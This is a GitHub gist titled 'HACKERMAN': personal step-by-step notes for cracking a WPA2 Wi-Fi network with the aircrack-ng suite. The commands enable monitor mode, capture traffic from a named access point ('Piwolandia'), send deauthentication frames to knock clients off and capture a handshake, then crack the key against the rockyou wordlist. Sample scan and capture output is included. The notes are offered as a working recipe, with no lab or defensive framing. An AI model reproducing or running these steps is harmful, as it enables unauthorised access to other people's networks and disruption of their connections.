Skip to content

Instantly share code, notes, and snippets.

@tieorange
Last active July 27, 2016 15:32
Show Gist options
  • Save tieorange/7e06d4afadc9802a910c to your computer and use it in GitHub Desktop.
Save tieorange/7e06d4afadc9802a910c to your computer and use it in GitHub Desktop.
HACKERMAN
1. airmon-ng -- see networks connections we have
2. airmon-ng start wlan0 -- switch to the monitor mode (hacker mode)
3. airodump-ng wlan0mon -- try to start scanning wifi. or show the processes wich interupts it
4. airmon-ng stop wlan0 -- turn off the interface wlan0 (but leave the wlan0mon interface)
5. airmon-ng check kill -- kill interupted processes
(to restore the wifi:
cd /etc/init.d && ./network-manager restart
or
/etc/init.d/network-manager restart
sudo ifconfig wlan0 up)
6. airmon-ng start wlan0 -- start the wlan0 interface
7. airodump-ng wlan0mon -- scan
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
58:23:8C:84:52:16 -57 5 295 140 1 54e WPA2 CCMP PSK Piwolandia
8. airodump-ng --bssid 58:23:8C:84:52:16 -c 1 --write /root/wifi_hack/boost wlan0mon
9. now we have to catch a handshake. So we open a new terminal and type:
aireplay-ng --deauth 5 -a 58:23:8C:84:52:16 wlan0mon -- try to break the connection in this wifi.
10. not we see:
CH 1 ][ Elapsed: 5 mins ][ 2015-11-30 13:44 ][ WPA handshake: 58:23:8C:84:52:16
11. Ctrl+C
12. aircrack-ng -w /root/wifi_hack/rockyou.txt -b 58:23:8C:84:52:16 /root/wifi_hack/boost-03.cap -- star cracking
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment